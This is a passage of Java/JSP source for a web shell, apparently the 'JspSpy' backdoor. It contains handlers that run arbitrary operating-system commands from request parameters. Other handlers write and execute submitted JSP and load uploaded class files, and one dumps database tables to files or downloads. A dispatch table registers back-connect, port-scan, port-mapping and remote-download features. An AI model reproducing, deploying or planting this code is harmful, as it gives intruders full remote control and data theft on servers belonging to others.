3655. + " <input type=\"button\" value=\"Stop\" class=\"bt\" onclick=\"$('ddtype').value='stop';this.form.submit()\">"
3656. + " </form>"
3657. + " <iframe style=\"display:none\" name=\"asyn\"></iframe>");
3658. out.println(" </td>" + " </tr>" + "</table>");
3659. } catch (Exception e) {
3660. throw e;
3661. }
3662. }
3663. }
3664.  
3665. private static class OnLineInvoker extends DefaultInvoker {
3666. public boolean doBefore() {
3667. return false;
3668. }
3669.  
3670. public boolean doAfter() {
3671. return false;
3672. }
3673.  
3674. public void invoke(HttpServletRequest request,
3675. HttpServletResponse response, HttpSession JSession)
3676. throws Exception {
3677. try {
3678. String type = request.getParameter("type");
3679. if (Util.isEmpty(type))
3680. return;
3681. if (type.toLowerCase().equals("start")) {
3682. String exe = request.getParameter("exe");
3683. if (Util.isEmpty(exe))
3684. return;
3685. Process pro = Runtime.getRuntime().exec(exe);
3686. ByteArrayOutputStream outs = new ByteArrayOutputStream();
3687. response.setContentLength(100000000);
3688. response.setContentType("text/html;charset="
3689. + System.getProperty("file.encoding"));
3690. OnLineProcess olp = new OnLineProcess(pro);
3691. JSession.setAttribute(SHELL_ONLINE, olp);
3692. new OnLineConnector(new ByteArrayInputStream(outs
3693. .toByteArray()), pro.getOutputStream(),
3694. "exeOclientR", olp).start();
3695. new OnLineConnector(pro.getInputStream(), response
3696. .getOutputStream(), "exeRclientO", olp).start();
3697. new OnLineConnector(pro.getErrorStream(), response
3698. .getOutputStream(), "exeRclientO", olp).start();
3699. Thread.sleep(1000 * 60 * 60 * 24);
3700. } else if (type.equals("ecmd")) {
3701. Object o = JSession.getAttribute(SHELL_ONLINE);
3702. String cmd = request.getParameter("cmd");
3703. if (Util.isEmpty(cmd))
3704. return;
3705. if (o == null)
3706. return;
3707. OnLineProcess olp = (OnLineProcess) o;
3708. olp.setCmd(cmd);
3709. } else {
3710. Object o = JSession.getAttribute(SHELL_ONLINE);
3711. if (o == null)
3712. return;
3713. OnLineProcess olp = (OnLineProcess) o;
3714. olp.stop();
3715. }
3716. } catch (Exception e) {
3717.  
3718. throw e;
3719. }
3720. }
3721. }
3722.  
3723. private static class EnterInvoker extends DefaultInvoker {
3724. public boolean doBefore() {
3725. return false;
3726. }
3727.  
3728. public boolean doAfter() {
3729. return false;
3730. }
3731.  
3732. public void invoke(HttpServletRequest request,
3733. HttpServletResponse response, HttpSession JSession)
3734. throws Exception {
3735. PrintWriter out = response.getWriter();
3736. String type = request.getParameter("type");
3737. if (!Util.isEmpty(type)) {
3738. JSession.removeAttribute(ENTER);
3739. JSession.removeAttribute(ENTER_MSG);
3740. JSession.removeAttribute(ENTER_CURRENT_DIR);
3741. JSession.setAttribute(MSG, "Exit File Success ! ");
3742. } else {
3743. String f = request.getParameter("filepath");
3744. if (Util.isEmpty(f))
3745. return;
3746. JSession.setAttribute(ENTER, f);
3747. JSession
3748. .setAttribute(
3749. ENTER_MSG,
3750. "You Are In File <a style='color:red'>\""
3751. + f
3752. + "\"</a> Now ! <a href=\"javascript:doPost({o:'enter',type:'exit'})\"> Exit </a>");
3753. }
3754. response.sendRedirect(SHELL_NAME);
3755. }
3756. }
3757.  
3758. private static class VExport2FileInvoker extends DefaultInvoker {
3759. public void invoke(HttpServletRequest request,
3760. HttpServletResponse response, HttpSession JSession)
3761. throws Exception {
3762. PrintWriter out = response.getWriter();
3763. String type = request.getParameter("type");
3764. String sql = request.getParameter("sql");
3765. String table = request.getParameter("table");
3766. if (Util.isEmpty(sql) && Util.isEmpty(table)) {
3767. JSession.setAttribute(SESSION_O, "vConn");
3768. response.sendRedirect(SHELL_NAME);
3769. return;
3770. }
3771. out
3772. .println("<form action=\"\" method=\"post\">"
3773. + "<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">"
3774. + " <tr>"
3775. + " <td>"
3776. + " <input type=\"hidden\" name=\"o\" value=\"export\"/>"
3777. + " <input type=\"hidden\" name=\"type\" value=\""
3778. + (Util.isEmpty(type) ? "" : type)
3779. + "\"/>"
3780. + " <input type=\"hidden\" name=\"sql\" value=\""
3781. + (Util.isEmpty(sql) ? "" : sql.replaceAll("\"",
3782. "&quot;"))
3783. + "\"/>"
3784. + " <input type=\"hidden\" name=\"table\" value=\""
3785. + (Util.isEmpty(table) ? "" : table)
3786. + "\"/>"
3787. + " <h2>Export To File &raquo;</h2>"
3788. + " "
3789. + " <hr/>Export \"<span style='color:red;font-weight:bold'>"
3790. + (Util.isEmpty(sql) ? table : sql.replaceAll("\"",
3791. "&quot;"))
3792. + "</span>\" To File : <input type=\"text\" style=\"font-weight:bold\" name=\"filepath\" value=\""
3793. + (JSession.getAttribute(CURRENT_DIR).toString() + "/exportdata.txt")
3794. + "\" size=\"100\" class=\"input\"/>"
3795. + " <select name='encode' class='input'><option value=''>ANSI</option><option value='GBK'>GBK</option><option value='UTF-8'>UTF-8</option><option value='ISO-8859-1'>ISO-8859-1</option></select>"
3796. + " <input type=\"submit\" class=\"bt\" value=\"Export\"/><br/><br/>"
3797. + BACK_HREF
3798. + "</td>"
3799. + " </tr>"
3800. + " </table>" + "</form>");
3801. }
3802. }
3803.  
3804. private static class ExportInvoker extends DefaultInvoker {
3805. public boolean doBefore() {
3806. return false;
3807. }
3808.  
3809. public boolean doAfter() {
3810. return false;
3811. }
3812.  
3813. public void invoke(HttpServletRequest request,
3814. HttpServletResponse response, HttpSession JSession)
3815. throws Exception {
3816. String type = request.getParameter("type");
3817. String filepath = request.getParameter("filepath");
3818. String encode = request.getParameter("encode");
3819. String sql = null;
3820. DBOperator dbo = null;
3821. dbo = (DBOperator) JSession.getAttribute(DBO);
3822.  
3823. if (Util.isEmpty(type)) {
3824. //table export
3825. String tb = request.getParameter("table");
3826. if (Util.isEmpty(tb))
3827. return;
3828. String s = dbo.getConn().getMetaData()
3829. .getIdentifierQuoteString();
3830. sql = "select * from " + s + tb + s;
3831.  
3832. } else if (type.equals("queryexp")) {
3833. //query export
3834. sql = request.getParameter("sql");
3835. if (Util.isEmpty(sql)) {
3836. JSession.setAttribute(SESSION_O, "vConn");
3837. response.sendRedirect(SHELL_NAME);
3838. return;
3839. }
3840. }
3841. Object o = dbo.execute(sql);
3842. ByteArrayOutputStream bout = new ByteArrayOutputStream();
3843. byte[] rowSep = "\r\n".getBytes();
3844. if (o instanceof ResultSet) {
3845. ResultSet rs = (ResultSet) o;
3846. ResultSetMetaData meta = rs.getMetaData();
3847. int count = meta.getColumnCount();
3848. for (int i = 1; i <= count; i++) {
3849. String colName = meta.getColumnName(i) + "\t";
3850. byte[] b = null;
3851. if (Util.isEmpty(encode))
3852. b = colName.getBytes();
3853. else
3854. b = colName.getBytes(encode);
3855. bout.write(b, 0, b.length);
3856. }
3857. bout.write(rowSep, 0, rowSep.length);
3858. while (rs.next()) {
3859. for (int i = 1; i <= count; i++) {
3860. String v = null;
3861. try {
3862. v = rs.getString(i);
3863. } catch (SQLException ex) {
3864. v = "<<Error!>>";
3865. }
3866. v += "\t";
3867. byte[] b = null;
3868. if (Util.isEmpty(encode))
3869. b = v.getBytes();
3870. else
3871. b = v.getBytes(encode);
3872. bout.write(b, 0, b.length);
3873. }
3874. bout.write(rowSep, 0, rowSep.length);
3875. }
3876. rs.close();
3877. ByteArrayInputStream input = new ByteArrayInputStream(bout
3878. .toByteArray());
3879. BufferedOutputStream output = null;
3880. if (!Util.isEmpty(filepath)) {
3881. //export2file
3882. output = new BufferedOutputStream(new FileOutputStream(
3883. new File(filepath)));
3884. } else {
3885. //download.
3886. response.setHeader("Content-Disposition",
3887. "attachment;filename=DataExport.txt");
3888. output = new BufferedOutputStream(response
3889. .getOutputStream());
3890. }
3891. byte[] data = new byte[1024];
3892. int len = input.read(data);
3893. while (len != -1) {
3894. output.write(data, 0, len);
3895. len = input.read(data);
3896. }
3897. bout.close();
3898. input.close();
3899. output.close();
3900. if (!Util.isEmpty(filepath)) {
3901. JSession.setAttribute(MSG, "Export To File Success !");
3902. response.sendRedirect(SHELL_NAME);
3903. }
3904. }
3905. }
3906. }
3907.  
3908. private static class EvalInvoker extends DefaultInvoker {
3909. public void invoke(HttpServletRequest request,
3910. HttpServletResponse response, HttpSession JSession)
3911. throws Exception {
3912. String type = request.getParameter("type");
3913. PrintWriter out = response.getWriter();
3914. Object msg = JSession.getAttribute(MSG);
3915. if (msg != null) {
3916. Util.outMsg(out, (String) msg);
3917. JSession.removeAttribute(MSG);
3918. }
3919. if (Util.isEmpty(type)) {
3920. out
3921. .println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">"
3922. + " <tr>"
3923. + " <td><h2>Eval Java Code &raquo;</h2>"
3924. + "<hr/>"
3925. + " <p>"
3926. + " <form action=\""
3927. + SHELL_NAME
3928. + "?o=eu\" method=\"post\" enctype=\"multipart/form-data\">"
3929. + "UpLoad a Class File : ");
3930. Util
3931. .outMsg(
3932. out,
3933. "<pre>"
3934. + "<span style='color:blue'>public class</span> SpyEval{\r\n"
3935. + " <span style='color:blue'>static</span> {\r\n"
3936. + " <span style='color:green'>//Your Code Here.</span>\r\n"
3937. + " }\r\n" + "}\r\n" + "</pre>", "left");
3938. out
3939. .println(" <input class=\"input\" name=\"file\" type=\"file\"/> <input type=\"submit\" class=\"bt\" value=\" Eval \"></form><hr/>"
3940. + " <form action=\""
3941. + SHELL_NAME
3942. + "\" method=\"post\"><p></p>Jsp Eval : <br/>"
3943. + " <input type=\"hidden\" name=\"o\" value=\"ev\"><input type=\"hidden\" name=\"type\" value=\"jsp\">"
3944. + " <textarea name=\"jspc\" rows=\"15\" cols=\"70\">"
3945. + URLDecoder
3946. .decode(
3947. "%3C%25%40page+pageEncoding%3D%22utf-8%22%25%3E%0D%0A%3C%25%0D%0A%2F%2Fyour+code+here.%0D%0Aout.println%28%22create+a+jsp+file+then+include+it+%21+by++ninty%22%29%3B%0D%0A%25%3E",
3948. "utf-8")
3949. + "</textarea>"
3950. + " <br/><input class=\"bt\" name=\"button\" id=\"button\" value=\"Eval\" type=\"submit\" size=\"100\" />"
3951. + " </form>"
3952. + " </p>"
3953. + " </td>"
3954. + " </tr>" + "</table>");
3955. } else if (type.equals("jsp")) {
3956. String jspc = request.getParameter("jspc");
3957. if (Util.isEmpty(jspc))
3958. return;
3959. File f = new File(SHELL_DIR, "evaltmpninty.jsp");
3960. BufferedWriter writer = new BufferedWriter(
3961. new OutputStreamWriter(new FileOutputStream(f), "utf-8"));
3962. writer.write(jspc, 0, jspc.length());
3963. writer.flush();
3964. writer.close();
3965. out
3966. .println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">"
3967. + " <tr>"
3968. + " <td><h2>Jsp Eval Result &raquo;</h2>");
3969. out
3970. .println("<div style=\"background:#f1f1f1;border:1px solid #ddd;padding:15px;font:14px;text-align:left;font-weight:bold;margin:10px\">");
3971. request.getRequestDispatcher("evaltmpninty.jsp").include(
3972. request, response);
3973. out
3974. .println("</div><input type=\"button\" value=\" Back \" class=\"bt\" onclick=\"history.back()\"></td></tr></table> ");
3975. f.delete();
3976. }
3977. }
3978. }
3979.  
3980. private static class EvalUploadInvoker extends DefaultInvoker {
3981. public void invoke(HttpServletRequest request,
3982. HttpServletResponse response, HttpSession JSession)
3983. throws Exception {
3984. ByteArrayOutputStream stream = new ByteArrayOutputStream();
3985. UploadBean upload = new UploadBean();
3986. upload.setTargetOutput(stream);
3987. upload.parseRequest(request);
3988.  
3989. if (stream.toByteArray().length == 2) {
3990. JSession.setAttribute(MSG, "Please Upload Your Class File ! ");
3991. ((Invoker) ins.get("ev")).invoke(request, response, JSession);
3992. return;
3993. }
3994. SpyClassLoader loader = new SpyClassLoader();
3995. try {
3996. Class c = loader.defineClass(null, stream.toByteArray());
3997. c.newInstance();
3998. } catch (Exception e) {
3999. }
4000. stream.close();
4001. JSession.setAttribute(MSG, "Eval Java Class Done ! ");
4002. ((Invoker) ins.get("ev")).invoke(request, response, JSession);
4003. }
4004. }
4005.  
4006. private static class VOtherInvoker extends DefaultInvoker {
4007. public void invoke(HttpServletRequest request,
4008. HttpServletResponse response, HttpSession JSession)
4009. throws Exception {
4010. try {
4011. PrintWriter out = response.getWriter();
4012. Object msg = JSession.getAttribute(MSG);
4013. if (msg != null) {
4014. Util.outMsg(out, (String) msg);
4015. JSession.removeAttribute(MSG);
4016. }
4017. out
4018. .println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">"
4019. + " <tr>"
4020. + " <td><h2 id=\"Bin_H2_Title\">Session Manager&gt;&gt;</h2><hr/>"
4021. + " <div id=\"hOWTm\" style=\"line-height:30px\">"
4022. + " <ul>");
4023. Enumeration en = JSession.getAttributeNames();
4024. while (en.hasMoreElements()) {
4025. Object o = en.nextElement();
4026. if (o.toString().equals(MSG))
4027. continue;
4028. out
4029. .println("<li><form action='"
4030. + SHELL_NAME
4031. + "' method='post'><u>"
4032. + o.toString()
4033. + "</u> <input type=\"text\" name=\"value\" class=\"input\" size=\"50\" value=\""
4034. + JSession.getAttribute(o.toString())
4035. + "\">");
4036. out
4037. .println("<input type='button' class='bt' value='Update' onclick=\"this.form.elements['type'].value='update';this.form.submit()\"> <input type='button' onclick=\"this.form.elements['type'].value='delete';this.form.submit()\" class='bt' value='Delete'/>");
4038. out
4039. .println("<input type='hidden' name='o' value='sm'/><input type='hidden' name='type'/>");
4040. out.println("<input type='hidden' name='name' value='"
4041. + o.toString() + "'/>");
4042. out.println("</form></li>");
4043. }
4044. out
4045. .println("<li style='list-style:none'><form action='"
4046. + SHELL_NAME
4047. + "' method='post'><fieldset>"
4048. + "<legend>New Session Attribute</legend>"
4049. + "name : <input type=\"text\" name=\"name\" value=\"\" class=\"input\"> value : <input type=\"text\""
4050. + " name=\"value\" class=\"input\"/> <input type='submit' value='Add' class='bt'><input type='hidden' name='o' value='sm'/><input type='hidden' name='type' value='update'>"
4051. + " </fieldset></form></li></ul></div></td>"
4052. + " </tr>" + " </table>");
4053. } catch (Exception e) {
4054. throw e;
4055. }
4056. }
4057. }
4058.  
4059. //Session Manager
4060. private static class SmInvoker extends DefaultInvoker {
4061. public void invoke(HttpServletRequest request,
4062. HttpServletResponse response, HttpSession JSession)
4063. throws Exception {
4064. try {
4065. String type = request.getParameter("type");
4066. PrintWriter out = response.getWriter();
4067. if (type.equals("update")) {
4068. String name = request.getParameter("name");
4069. String value = request.getParameter("value");
4070. JSession.setAttribute(name, value);
4071. JSession
4072. .setAttribute(MSG, "Update/Add Attribute Success !");
4073. } else if (type.equals("delete")) {
4074. String name = request.getParameter("name");
4075. JSession.removeAttribute(name);
4076. JSession.setAttribute(MSG, "Remove Attribute Success !");
4077. }
4078. ((Invoker) ins.get("vother")).invoke(request, response,
4079. JSession);
4080. } catch (Exception e) {
4081.  
4082. throw e;
4083. }
4084. }
4085. }
4086.  
4087. static {
4088. ins.put("script", new ScriptInvoker());
4089. ins.put("before", new BeforeInvoker());
4090. ins.put("after", new AfterInvoker());
4091. ins.put("deleteBatch", new DeleteBatchInvoker());
4092. ins.put("clipboard", new ClipBoardInvoker());
4093. ins.put("vPortScan", new VPortScanInvoker());
4094. ins.put("portScan", new PortScanInvoker());
4095. ins.put("vConn", new VConnInvoker());
4096. ins.put("dbc", new DbcInvoker());
4097. ins.put("executesql", new ExecuteSQLInvoker());
4098. ins.put("vLogin", new VLoginInvoker());
4099. ins.put("login", new LoginInvoker());
4100. ins.put("filelist", new FileListInvoker());
4101. ins.put("logout", new LogoutInvoker());
4102. ins.put("upload", new UploadInvoker());
4103. ins.put("copy", new CopyInvoker());
4104. ins.put("bottom", new BottomInvoker());
4105. ins.put("vCreateFile", new VCreateFileInvoker());
4106. ins.put("vEdit", new VEditInvoker());
4107. ins.put("createFile", new CreateFileInvoker());
4108. ins.put("vEditProperty", new VEditPropertyInvoker());
4109. ins.put("editProperty", new EditPropertyInvoker());
4110. ins.put("vs", new VsInvoker());
4111. ins.put("shell", new ShellInvoker());
4112. ins.put("down", new DownInvoker());
4113. ins.put("vd", new VdInvoker());
4114. ins.put("downRemote", new DownRemoteInvoker());
4115. ins.put("index", new IndexInvoker());
4116. ins.put("mkdir", new MkDirInvoker());
4117. ins.put("move", new MoveInvoker());
4118. ins.put("removedir", new RemoveDirInvoker());
4119. ins.put("packBatch", new PackBatchInvoker());
4120. ins.put("pack", new PackInvoker());
4121. ins.put("unpack", new UnPackInvoker());
4122. ins.put("vmp", new VmpInvoker());
4123. ins.put("vbc", new VbcInvoker());
4124. ins.put("backConnect", new BackConnectInvoker());
4125. ins.put("jspEnv", new JspEnvInvoker());
4126. ins.put("smp", new SmpInvoker());
4127. ins.put("mapPort", new MapPortInvoker());
4128. ins.put("top", new TopInvoker());
4129. ins.put("vso", new VOnLineShellInvoker());
4130. ins.put("online", new OnLineInvoker());
4131. ins.put("enter", new EnterInvoker());
4132. ins.put("export", new ExportInvoker());
4133. ins.put("ev", new EvalInvoker());
4134. ins.put("eu", new EvalUploadInvoker());
4135. ins.put("vother", new VOtherInvoker());
4136. ins.put("sm", new SmInvoker());
4137. ins.put("vExport", new VExport2FileInvoker());
4138. ins.put("vPack", new VPackConfigInvoker());
4139. ins.put("reflect", new ReflectInvoker());
4140. ins.put("portBack", new PortBackInvoker());
4141. }%>
4142. <%
4143. try {
4144. String o = request.getParameter("o");
4145. if (Util.isEmpty(o)) {
4146. if (session.getAttribute(SESSION_O) == null)
4147. o = "index";
4148. else {
4149. o = session.getAttribute(SESSION_O).toString();
4150. session.removeAttribute(SESSION_O);
4151. }
4152. }
4153. Object obj = ins.get(o);
4154. if (obj == null) {
4155. response.sendRedirect(SHELL_NAME);
4156. } else {
4157. Invoker in = (Invoker) obj;
4158. if (in.doBefore()) {
4159. String path = request.getParameter("folder");
4160. if (!Util.isEmpty(path)
4161. && session.getAttribute(ENTER) == null)
4162. session.setAttribute(CURRENT_DIR, path);
4163. ((Invoker) ins.get("before")).invoke(request, response,
4164. session);
4165. ((Invoker) ins.get("script")).invoke(request, response,
4166. session);
4167. ((Invoker) ins.get("top")).invoke(request, response,
4168. session);
4169. }
4170. in.invoke(request, response, session);
4171. if (!in.doAfter()) {
4172. return;
4173. } else {
4174. ((Invoker) ins.get("bottom")).invoke(request, response,
4175. session);
4176. ((Invoker) ins.get("after")).invoke(request, response,
4177. session);
4178. }
4179. }
4180. } catch (Exception e) {
4181. Object msg = session.getAttribute(MSG);
4182. if (msg != null) {
4183. Util.outMsg(out, (String) msg);
4184. session.removeAttribute(MSG);
4185. }
4186. if (e.toString().indexOf("ClassCastException") != -1) {
4187. Util.outMsg(out, MODIFIED_ERROR + BACK_HREF);
4188. }
4189. ByteArrayOutputStream bout = new ByteArrayOutputStream();
4190. e.printStackTrace(new PrintStream(bout));
4191. session.setAttribute(CURRENT_DIR, SHELL_DIR);
4192. Util.outMsg(out, Util
4193. .htmlEncode(new String(bout.toByteArray())).replaceAll(
4194. "\n", "<br/>"), "left");
4195. bout.close();
4196. out.flush();
4197. ((Invoker) ins.get("bottom"))
4198. .invoke(request, response, session);
4199. ((Invoker) ins.get("after")).invoke(request, response, session);
4200. }
4201. %>